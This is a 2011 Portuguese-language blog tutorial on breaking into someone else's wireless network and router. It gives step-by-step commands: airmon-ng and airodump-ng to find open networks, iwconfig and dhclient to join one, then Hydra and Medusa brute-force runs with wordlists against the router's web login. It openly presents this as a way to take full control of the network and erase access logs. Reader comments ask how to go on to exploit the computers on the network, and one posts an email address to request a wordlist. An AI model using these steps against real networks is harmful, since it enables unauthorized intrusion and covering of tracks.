terça-feira, 22 de março de 2011

Invadindo um roteador -backtrack 4 - Medusa


Então e agora que vc ja conseguiu invadir A REDE como apagar os logs de acesso do seu pc no roteador?
ou se precisar reiniciar o roteador???
entao hj vou passar um tuto como invadir o roteador
tomando controle total da rede wireless

vamos la
nesse tutorial eu utilizei uma versão do linux
o backtrack 4 mas vc pode usar o velho windows com programas de brute force
detalhes
a autenticacao tem q estar aberta
e o dhcp ativado

passos resumidos:
indentificar a rede
ter acesso a rede
obter um endereço ip
verificar o gateway
verificar o caminho da pagina de configuracao do roteador
iniciar Hydra/ Medusa usando wordlist para o login e senha caso o login n seja conhecido(no caso os default)
vamos la:
primeiro comando
airmon-ng start wlan0 // deixa sua placa em modo monitor

airodump-ng mon0 -t opn


ficará assim:


o segundo comando:


ifconfig wlan0 down
iwconfig wlan0 essid default channel 1 iwconfig wlan0 essid um canal padrão
iwconfig ap 00:13:D4:09:32:60 iwconfig ap 00:13: D4: 09:32:60
ifconfig wlan0 up ifconfig wlan0 up

preste atenção na imagem vc vai entender!


Verificar a conexão
iwconfig wlan0


Obter um endereço IP e gateway
dhclient wlan0



Antes de mais nada verifique
os logins padroes do roteador


caso não encontre
vc vai parar nessa pagina, mais ou menos

entaão caso tenha tentado e n tenha conseguido vamos la...vc vai precisar de uma word list eu uso o dicionario do broffice muito bom.
Começando Hydra para quebrar o login router / senha.
-L specifiying the path to login list -L especificando o caminho para login lista
-P specifying the path to password list -P especificando o caminho para a lista de senhas
-t limiting the number of connections T limitar o número de conexões
-e ns to check for no password and to check login as password ns-e para verificar se nenhuma senha e login para verificar como senha
-f to stop when first login/password is found -F para parar quando primeiro login / password é encontrado
-V to show each login/password attempt -V para mostrar cada login / tentativa de senha
http-get to specify the protocol to use http-get para especificar o protocolo a ser usado
/index.asp to point to the webpage it is heading to / Index.asp para apontar para a página que está indo para

hydra 192.168.1.1 -L /wordlists/login.txt -P /wordlists/ap_password.txt -t 1 -e ns -f -V http-get /index.asp



Para Medusa
-H para especificar o host
-U to specify path to the login wordlist -U para especificar o caminho para a wordlist login
-P to specify path to password wordlist -P para especificar caminho para wordlist senha
-t to limit the number of connections -T para limitar o número de conexões
-f to stop the test on finding a valid login/password -F para parar o teste em encontrar um login / password
-v for a more verbose output -V verbose para uma saída mais
-M to specify the module to use -M para especificar o módulo para usar
-m to specify the options for the module in use -M para especificar as opções para o módulo em uso

medusa -h 192.168.1.1 -U /wordlists/login.txt -P /wordlists/ap_password.txt -t 1 -e ns -f -v 5 -M http -m DIR:GET/index.asp



3 comentários:

  1. Massa manow!!!

    Ajudou me bastante!

    ResponderExcluir
  2. muito bom, existe alguma maneira de se invadir a rede pra poder rodar os exploits e invadir o pc da rede?

    ResponderExcluir
  3. pessoal, preciso de uma wordlist, para acessar um roteador. se alguem puder me enviar, agradeço. gostei muito, das explicaçoes, gama693@yahoo.com.br aguardo.

    ResponderExcluir